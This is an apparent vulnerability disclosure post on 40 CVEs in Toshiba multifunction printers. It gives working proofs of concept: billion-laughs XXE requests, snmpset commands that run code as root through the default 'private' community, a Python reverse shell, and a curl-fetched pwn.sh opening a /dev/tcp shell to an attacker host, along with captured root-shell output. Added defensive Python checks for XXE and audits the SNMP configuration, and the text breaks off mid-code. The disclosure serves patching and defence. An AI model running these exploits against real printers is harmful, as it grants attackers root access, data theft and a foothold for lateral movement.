Discovering 40 Vulnerabilities in Toshiba Multifunction Printers (Part 1)

IoT, 2 months ago, admin

Vulnerability Summary

Vulnerable versions: 103 different models of Toshiba Multifunction Printers (MFPs) are vulnerable. It is recommended to consult Toshiba's official advisory for the list of affected printers, apply the security patches, and replace unsupported MFP models.

The vulnerabilities are summarised below:

  1. CVE-2024-27141 – Pre-auth blind XML External Entity (XXE) injection – DoS

  2. CVE-2024-27142 – Pre-auth XXE injection

  3. CVE-2024-27143 – Pre-auth remote code execution as root

  4. CVE-2024-27144 – Pre-auth remote code execution as root or apache and multiple local privilege escalations
    4.1. Remote code execution – uploading a new .py module into a WSGI Python program
    4.2. Remote code execution – uploading a new .ini configuration file into a WSGI Python program
    4.3. Remote code execution – uploading a malicious /tmp/backtraceScript.sh script and injecting malicious gdb commands
    4.4. Remote code execution – uploading a malicious /home/SYSROM_SRC/build/common/bin/sapphost.py program
    4.5. Remote code execution – uploading malicious libraries
    4.6. Other ways to obtain remote code execution

  5. CVE-2024-27145 – Multiple authenticated remote code executions as root

  6. CVE-2024-27146 – Lack of privilege separation

  7. CVE-2024-27147 – Local privilege escalation and remote code execution using snmpd

  8. CVE-2024-27148 – Local privilege escalation and remote code execution using an insecure PATH

  9. CVE-2024-27149 – Local privilege escalation and remote code execution using an insecure LD_PRELOAD

  10. CVE-2024-27150 – Local privilege escalation and remote code execution using an insecure LD_LIBRARY_PATH

  11. CVE-2024-27151 – Local privilege escalation and remote code execution using insecure permissions on 106 programs
    11.1. 3 vulnerable programs not running as root
    11.2. 103 vulnerable programs running as root

  12. CVE-2024-27152 – Local privilege escalation and remote code execution using insecure library permissions
    12.1. Example: /home/SYSROM_SRC/bin/syscallerr

  13. CVE-2024-27153 – Local privilege escalation and remote code execution using CISSM

  14. CVE-2024-27154 and CVE-2024-27155 – Passwords stored in clear-text logs and in insecure logs
    14.1. Clear-text password written to the logs when a user logs in to the printer
    14.2. Clear-text password written to the logs when a password is changed

  15. CVE-2024-27156 – Authentication session leak in insecure logs in the /ramdisk/work/log directory

  16. CVE-2024-27157 – Authentication session leak in insecure logs in the /ramdisk/al/network/log directory

  17. CVE-2024-27158 – Hard-coded root password

  18. CVE-2024-27159 – Hard-coded password used to encrypt logs

  19. CVE-2024-27160 – Hard-coded password used to encrypt logs and use of a weak password digest

  20. CVE-2024-27161 – Hard-coded password used to encrypt files

  21. CVE-2024-27162 – DOM-based XSS in the /js/TopAccessUtil.js file

  22. CVE-2024-27163 – Leak of the administrator password and of other passwords

  23. CVE-2024-27164 – Hard-coded credentials in telnetd

  24. CVE-2024-27165 – Local privilege escalation using PROCSUID

  25. CVE-2024-27166 – Insecure permissions on core files

  26. CVE-2024-27167 – Insecure permissions used by Sendmail – local privilege escalation

  27. CVE-2024-27168 – Hard-coded key used to generate authentication cookies found in the Python applications

  28. CVE-2024-27169 – Lack of authentication in WebPanel – local privilege escalation

  29. CVE-2024-27170 – Hard-coded credentials for WebDAV access

  30. CVE-2024-27171 – Insecure permissions

  31. CVE-2024-27172 – Remote code execution – command injection as root

  32. CVE-2024-27173 – Remote code execution – insecure upload

  33. CVE-2024-27174 – Remote code execution – insecure upload

  34. CVE-2024-27175 – Local file inclusion

  35. CVE-2024-27176 – Remote code execution – insecure upload

  36. CVE-2024-27177 – Remote code execution – insecure upload

  37. CVE-2024-27178 – Remote code execution – insecure copy

  38. CVE-2024-27179 – Session leak inside log files during application installation

  39. CVE-2024-27180 – TOCTOU vulnerability in application installation, allowing malicious applications to be installed and RCE to be obtained

CVE-2024-27171 to CVE-2024-27180 affect the implementation of the third-party application system and of the third-party applications installed by default on Toshiba printers – an extremely interesting attack surface for persistence.

TL;DR: An attacker can exploit multiple vulnerabilities to compromise Toshiba Multifunction Printers.

List of vulnerable Toshiba MFP models (103 models):

2021AC, 2521AC, 2020AC, 2520AC, 2025NC, 2525AC, 3025AC, 3525AC, 3525ACG, 4525AC, 4525ACG, 5525AC, 5525ACG,
6525AC, 6525ACG, 2528A, 3028A, 3528A, 3528AG, 4528A, 4528AG, 5528A, 6528A, 6526AC, 6527AC, 7527AC, 6529A,
7529A, 9029A, 330AC, 400AC, 2010AC, 2110AC, 2510AC, 2610AC, 2015NC, 2515AC, 2615AC, 3015AC, 3115AC, 3515AC,
3615AC, 4515AC, 4615AC, 5015AC, 5115AC, 2018A, 2518A, 2618A, 3018A, 3118A, 3018AG, 3518A, 3518AG, 3618A,
3618AG, 4518A, 4518AG, 4618A, 4618AG, 5018A, 5118A, 5516AC, 5616AC, 6516AC, 6616AC, 7516AC, 7616AC, 5518A,
5618A, 6518A, 6618A, 7518A, 7618A, 8518A, 8618A, 2000AC, 2500AC, 2005NC, 2505AC, 3005AC, 3505AC, 4505AC,
5005AC, 2008A, 2508A, 3008A, 3008AG, 3508A, 3508AG, 4508A, 4508AG, 5008A, 5506AC, 6506AC, 7506AC, 5508A,
6508A, 7508A, 8508A, 3508LP, 4508LP, 5008LP.

Additional Notes

This security assessment was carried out entirely black-box and fully remotely – I only had the IPs of some printers (no physical access and no administrator or regular-user credentials). Consequently, the physical security of the printers was not analysed; the vulnerabilities were confirmed on different models running the latest firmware versions (e-STUDIO2010AC, e-STUDIO3005AC, e-STUDIO3508A and e-STUDIO5018A).

The vulnerabilities were reported to Toshiba on 14 June 2023, and communication with Toshiba was very effective.

Impact

An attacker can compromise Toshiba Multifunction Printers (MFPs) and execute code. These printers run Linux and are powerful machines. They are ideal for hosting implants (and interesting programs such as Bettercap) and for moving laterally inside the infrastructure.

Recommendations

  • Use network segmentation to isolate MFPs.

  • Apply the security patches.

  • Replace unsupported MFPs.

Details – Pre-auth blind XML External Entity (XXE) injection – DoS

Toshiba printers use XML for communication with the /contentwebserver API endpoint provided by the printer.

This endpoint is handled by an Apache module located in the mod_contentwebserver.so library. This library provides the XML parsing and is vulnerable to a time-based blind XML External Entity (XXE) attack.

Using a billion-laughs payload, we can confirm the presence of a time-based blind XXE vulnerability. When only 1 entity (&lol1) defined in the DTD is referenced inside the lolz root element, this &lol1 entity expands to 10 entities and the request takes 200 ms.

The entities are then expanded to:

  • 10^10 entities, the request takes 206 ms;

  • 10^10^10 entities, the request takes 541 ms;

  • 10^10^10^10 entities, the request takes 2.7 s;

  • 10^10^10^10^2 entities, the request takes 8.8 s;

  • 10^10^10^10^2 entities, the request takes 30.9 s;

Even though the Apache server answers MODULE_ERROR:SendRequest failed, this shows that the XML was successfully evaluated by the mod_contentwebserver.so library running on the remote printer.

The payload is:

POST /contentwebserver HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
csrfpId: 10.0.0.2.852d519a6fa9825fae857bac5c003da0
Content-Length: 759
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS
Cookie: Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0; Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DLOGS; IgnoreSessionTimeout=1

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol5;</lolz>

Using this HTTP request inside Burp (with a valid session obtained while browsing the printer without authentication), we can modify the entity on the last line; by comparing the time the printer needs to process the request, we can see that the XML is being parsed.

The time is displayed at the bottom right of the Burp window (in red in the screenshot below):

[screenshot]

With 10^10^10^10^4 entities, the request takes 30 seconds.

An HTTP request containing more XML complexity (a large number of XML entities to parse) will DoS the printer, with the printer's CPU running at 100%.

The XML parser is vulnerable to XXE without authentication.

Since some protections appear to be implemented in the XML parser, exfiltrating files over HTTP, FTP and gopher was not possible.

Details – Pre-auth XXE injection

Toshiba printers use XML for communication with the /contentwebserver API endpoint provided by the printer.

This endpoint is handled by an Apache module located in the mod_contentwebserver.so library. This library provides the XML parsing and is vulnerable to an XML External Entity (XXE) attack.

Using a billion-laughs payload together with correctly formatted printer data (using the Toshiba-specific, non-public DTD so that the tags are interpreted by the remote printer), we can confirm the XXE vulnerability. The printer returns the resulting evaluated XML:

[screenshot]

The malicious payload is (containing <X>&lol4;</X>):

POST /contentwebserver HTTP/1.1
Host: 10.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
csrfpId: 10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d
Content-Length: 1226
Origin: http://10.0.0.1:8080
Connection: close
Referer: http://10.0.0.1:8080/Administration/CreateNewPwd.html
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US; pageTrack=MAIN%3DDEVICE; IgnoreSessionTimeout=1; clicked=0; addrLastVisited=ADDRBK; Session=10.0.0.2.5d5255447c6eb69fc84a2d8c2056eb7d; PREF=%7BList%2C8%2CClip
boardForPage-%7D; PROGSTAT=0

<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<?xml version="1.0"?>
<DeviceInformationModel>
<GetValue>
<UserManager>
<View>
<Users/>
</View>
</UserManager>
</GetValue>
<SetValue>
<UserManager>
<View>
<Users>
<User>
<Information>
<X>&lol4;</X>
</Information>
</User>
</Users>
</View>
</UserManager>
</SetValue>
<Command>
<ForgotPassword>
<commandNode>UserManager/Users</commandNode>
<Params>
<userDetails contentType="XPath">UserManager/View/Users/User</userDetails>
<cmdDetails commandType="Reset"/>
</Params>
</ForgotPassword>
</Command>
</DeviceInformationModel>

The response will be:

HTTP/1.1 200 OK
Date: Wed, 27 May 2023 10:54:12 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=63072000
Accept-Language: en-US,en;q=0.5
Connection: close
Content-Type: text/xml
Content-Length: 30465

<?xml version="1.0"?>
<DeviceInformationModel>
<GetValue>
<UserManager>
<View>
<Users>
<User>
<Information>
<X>lollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollollol[...]lollollollollol</X>
</Information>
</User>
</Users>
</View>
</UserManager>
</GetValue>
<Command>
<ForgotPassword>
<commandNode>UserManager/Users</commandNode>
<Params>
<userDetails contentType="XPath">UserManager/View/Users/User</userDetails>
<cmdDetails commandType="Reset"/>
</Params>
<Response>
<statusOfOperation>STATUS_FAILED</statusOfOperation>
</Response>
</ForgotPassword>
</Command>
</DeviceInformationModel>
kali%

The XML parser is vulnerable to XXE without authentication.

An attacker can use the XXE to retrieve information.

Since an RCE (pre-auth remote code execution as root) was found at the same time, exploitability was not analysed in depth.
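
Both XXE findings above rest on entity expansion declared in the DTD of a /contentwebserver request. The Python below is an added example, not the printer's or the advisory's code: it computes the size a document would reach after expansion without ever building it (the advisory's lolz DTD is embedded as a constructed copy; &lol4; expands to the 30000 bytes that account for the 30465-byte response above) and shows the parser policy that closes the bug, which is to refuse any DOCTYPE before parsing.

```python
"""Pre-parse check for entity-expansion (billion laughs) payloads such as the lolz DTD
sent to /contentwebserver. Added example, not code from the printer or the advisory.
The expansion size is computed symbolically, so the check itself never materialises
the expanded text."""
import re
import xml.etree.ElementTree as ET

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^\[>]*(?:\[(.*?)\])?\s*>", re.S)
ENTITY_DECL_RE = re.compile(r"""<!ENTITY\s+([\w.-]+)\s+(?:"([^"]*)"|'([^']*)')\s*>""")
ENTITY_REF_RE = re.compile(r"&([\w.-]+);")
PREDEFINED = {"lt", "gt", "amp", "quot", "apos"}  # each expands to a single character

# Constructed copy of the DTD from the advisory's request (lol5 has only 3 references,
# exactly as on the page).
LOL_DTD = """<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>"""
PAGE_PAYLOAD = LOL_DTD + "\n<lolz>&lol5;</lolz>"


class UnsafeXML(ValueError):
    """Raised when a document must not be handed to a real XML parser."""


def internal_entities(xml):
    """General entities declared in the DOCTYPE internal subset, as {name: literal value}."""
    m = DOCTYPE_RE.search(xml)
    if not m or m.group(1) is None:
        return {}
    return {name: dq if dq else sq for name, dq, sq in ENTITY_DECL_RE.findall(m.group(1))}


def expanded_length(text, entities, _memo=None, _stack=()):
    """Characters `text` would occupy once every entity reference is expanded.
    Each entity is sized once (memoised); a reference cycle raises UnsafeXML."""
    memo = {} if _memo is None else _memo
    total, last = 0, 0
    for ref in ENTITY_REF_RE.finditer(text):
        total += ref.start() - last          # literal characters before this reference
        last = ref.end()
        name = ref.group(1)
        if name in PREDEFINED:
            total += 1
        elif name in entities:
            if name in _stack:
                raise UnsafeXML("recursive entity %s" % name)
            if name not in memo:
                memo[name] = expanded_length(entities[name], entities, memo, _stack + (name,))
            total += memo[name]
        else:
            total += ref.end() - ref.start()  # undeclared: a parser rejects it, count literally
    return total + len(text) - last


def analyse(xml):
    """Cheap pre-parse metrics for logging or alerting on a blocked request."""
    entities = internal_entities(xml)
    body = DOCTYPE_RE.sub("", xml, count=1)
    expanded = expanded_length(body, entities)
    return {
        "doctype": DOCTYPE_RE.search(xml) is not None,
        "entities": len(entities),
        "expanded_bytes": expanded,
        "amplification": expanded / max(len(xml), 1),
    }


def safe_parse(xml):
    """Parse only documents that carry no DOCTYPE at all: the printer's API never needs
    one, and without a DTD there is nothing for a billion-laughs payload to declare."""
    if analyse(xml)["doctype"]:
        raise UnsafeXML("DOCTYPE/DTD not accepted")
    return ET.fromstring(xml)


def is_accepted(xml):
    """True when safe_parse would hand the document to the parser."""
    try:
        safe_parse(xml)
        return True
    except (UnsafeXML, ET.ParseError):
        return False
```

The amplification figure is what a WAF or the endpoint itself would log for a rejected request; it is over 100 for the page's payload.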

Details – Pre-auth remote code execution as root

It was observed that Toshiba printers use SNMP for configuration.

By default, these communities are used:

  • public for read-only access;

  • private for read/write access.

Using the private community, it is possible to execute commands remotely as root on the remote printer.

For example, these commands will execute the id command as root on the remote printer:

kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c id'
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id

kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 6
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c id
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root)
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: uid=0(root) gid=2000(trusted) groups=0(root)
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: uid=0(root) gid=2000(trusted) groups=0(root)

Exploiting this vulnerability allows any attacker to obtain root access on a remote Toshiba printer, as shown below.

The following PoC will spawn a connect-back shell to 10.0.0.2:21/tcp with root privileges:

kali% snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private [ip] 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /home/SYSROM_SRC/build/release/bin/python 'nsExtendArgs."cmd"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect(("10.0.0.2",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")"'
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /home/SYSROM_SRC/build/release/bin/python
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "import sys,socket,os,pty;s=socket.socket();s.connect(("10.0.0.2",21));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")"
kali% snmpbulkwalk -c private -v2c [ip] NET-SNMP-EXTEND-MIB::nsExtendObjects

On the attacker's machine, we receive a shell on port 21/tcp:

kali# nc -l -v -p 21
listening on [any] 21 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 43467
sh-4.1# uname -ap
Linux MFP12188257 3.10.38-ltsi-WR6.0.0.11_standard #3010 SMP Wed Jul 6 16:20:23 IST 2022 i686 GNU/Linux
sh-4.1# id
uid=0(root) gid=2000(trusted) groups=0(root)
sh-4.1# exit

The attacker then has full root access to the printer, including full access to the encrypted partition:

kali# nc -l -v -p 443
listening on [any] 443 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36468
bash-4.1# df -h
df -h
Filesystem Size Used Avail Use% Mounted on
rootfs 4.8G 3.7G 904M 81% /
/dev/root 48M 28M 18M 62% /old_root
/dev/sda2 4.8G 3.7G 904M 81% /
/dev/sda13 4.8G 49M 4.5G 2% /platform
none 1.5G 188K 1.5G 1% /dev
/dev/sda3 4.8G 1.3G 3.4G 28% /rollback
/dev/sda5 25G 904M 23G 4% /work
/dev/sda6 2.9G 620M 2.2G 23% /registration
/dev/sda7 976M 1.3M 908M 1% /backup
/dev/sda8 32G 60M 30G 1% /imagedata
/dev/sda9 94G 65M 89G 1% /application
/dev/mapper/enc_encryption
992M 2.6M 964M 1% /encryption
/dev/sda12 119G 60M 112G 1% /storage
tmpfs 1.5G 3.7M 1.5G 1% /dev/shm
bash-4.1# mount
mount
rootfs on / type rootfs (rw)
/dev/root on /old_root type ext2 (rw,relatime,errors=continue,user_xattr)
proc on /old_root/proc type proc (rw,relatime)
/dev/sda2 on / type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda13 on /platform type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
proc on /proc type proc (rw,relatime)
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
none on /dev type tmpfs (rw,relatime,mode=755)
ramfs on /ramdisk type ramfs (rw,relatime,size=100m)
/dev/sda3 on /rollback type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda5 on /work type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda6 on /registration type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda7 on /backup type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda8 on /imagedata type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda9 on /application type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/mapper/enc_encryption on /encryption type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
/dev/sda12 on /storage type ext4 (rw,relatime,nodelalloc,nobarrier,data=ordered)
tmpfs on /dev/shm type tmpfs (rw,relatime,mode=755)
devpts on /dev/pts type devpts (rw,relatime,mode=600)
fusectl on /sys/fs/fuse/connections type fusectl (rw,relatime)
bash-4.1#

The vulnerability lies inside net-snmpd, because net-snmpd supports the NET-SNMP-EXTEND-MIB extension MIB.

This extension allows code to be executed with the privileges of the net-snmpd daemon (root), in 2 steps:

  1. Definition of the new MIB entry;

  2. Execution of the new MIB entry.

A bash payload is also provided:

The following PoC will download a shell script, save it as /dev/shm/pwn.sh and execute it as root on the target printer:

kali% cat /var/www/html/pwn.sh 
#!/bin/sh

bash -i >& /dev/tcp/10.0.0.2/443 0>&1

kali% cat ./remote-pwn.sh
#!/bin/sh

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = '-c "chmod 755 /dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private $1 'nsExtendStatus."cmd"' = createAndGo 'nsExtendCommand."cmd"' = /bin/sh 'nsExtendArgs."cmd"' = ' "/dev/shm/pwn.sh"'
snmpbulkwalk -c private -v2c $1 NET-SNMP-EXTEND-MIB::nsExtendObjects

Using this PoC to obtain a connect-back root shell:

kali% ./remote-pwn.sh 10.0.0.1
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: -c "curl http://10.0.0.2/pwn.sh -o /dev/shm/pwn.sh"
NET-SNMP-EXTEND-MIB::nsExtendInput."cmd" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."cmd" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."cmd" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."cmd" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."cmd" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."cmd" = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."cmd" = INTEGER: 3
NET-SNMP-EXTEND-MIB::nsExtendResult."cmd" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".1 = STRING: % Total % Received % Xferd Average Speed Time Time Time Current
NET-SNMP-EXTEND-MIB::nsExtendOutLine."cmd".2 = STRING: Dload Upload Total Spent Left Speed
100 53 100 53 0 0 53 0 0:00:01 --:--:-- 0:00:01 114
Error in packet.
Reason: inconsistentValue (The set value is illegal or unsupported in some way)
Failed object: NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd"
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 21
NET-SNMP-EXTEND-MIB::nsExtendStatus."cmd" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."cmd" = STRING: /bin/sh
NET-SNMP-EXTEND-MIB::nsExtendArgs."cmd" = STRING: "/dev/shm/pwn.sh"
caTimeout: No Response from 10.0.0.1

And the connect-back shell script connects to port 443/tcp of 10.0.0.2, as defined in the pwn.sh script above:

kali# nc -l -v -p 443 
listening on [any] 443 ...
10.0.0.1: inverse host lookup failed: Unknown host
connect to [10.0.0.2] from (UNKNOWN) [10.0.0.1] 36464
bash-4.1# uname -ap
Linux MFP14144292 3.10.38-ltsi-WR6.0.0.11_standard #3513 SMP Tue Jul 5 09:58:22 IST 2022 i686 GNU/Linux
bash-4.1# id
uid=0(root) gid=2000(trusted) groups=0(root)
bash-4.1#

We can also look at the configuration file located at /encryption/al/network/config/snmpd.conf, which contains the default communities:

bash-4.1# grep -v '^#' /encryption/al/network/config/snmpd.conf
rocommunity public

rocommunity6 public

rwcommunity private

rwcommunity6 private

com2sec udp 0.0.0.0/24 public

view all included .1 80
view generaluser_view excluded .1
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.23.2.1.3
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.3
view generaluser_view included .1.3.6.1.4.1.1129.2.3.50.1.3.21.4.1.4

access udpGroup "toshibaAmerica" v1 noauth exact all all none
access admin_priv_group "" usm priv prefix all all none
access admin_auth_group "" usm auth prefix all all none
access generaluser_priv_group "" usm priv prefix all generaluser_view none
access generaluser_auth_group "" usm auth prefix all generaluser_view none

trapcommunity public

dlmod mibs_impl /home/SYSROM_SRC/lib/libalmibs_impl.so

master off

agentaddress udp:161,udp6:161

authtrapenable 1

maxGetbulkRepeats 20

maxGetbulkResponses 100
bash-4.1#

SNMP is also exposed over IPv6.
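
The root cause is a writable community with no source restriction and no view, which leaves the nsExtendObjects subtree reachable. Added example, not from the advisory or the printer: a small snmpd.conf auditor that resolves each community's view net-snmp style and reports which communities can create nsExtend rows. The printer configuration is a constructed copy of the file above; the hardened configuration is an assumption showing per-host sources and a view that excludes the extend subtree.

```python
"""Audit a net-snmp snmpd.conf for communities that can reach NET-SNMP-EXTEND-MIB.
Added example (not the printer's or the advisory's code)."""
import shlex

EXTEND_OID = ".1.3.6.1.4.1.8072.1.3.2"   # nsExtendObjects: a writable row runs a command
DEFAULT_COMMUNITIES = {"public", "private"}
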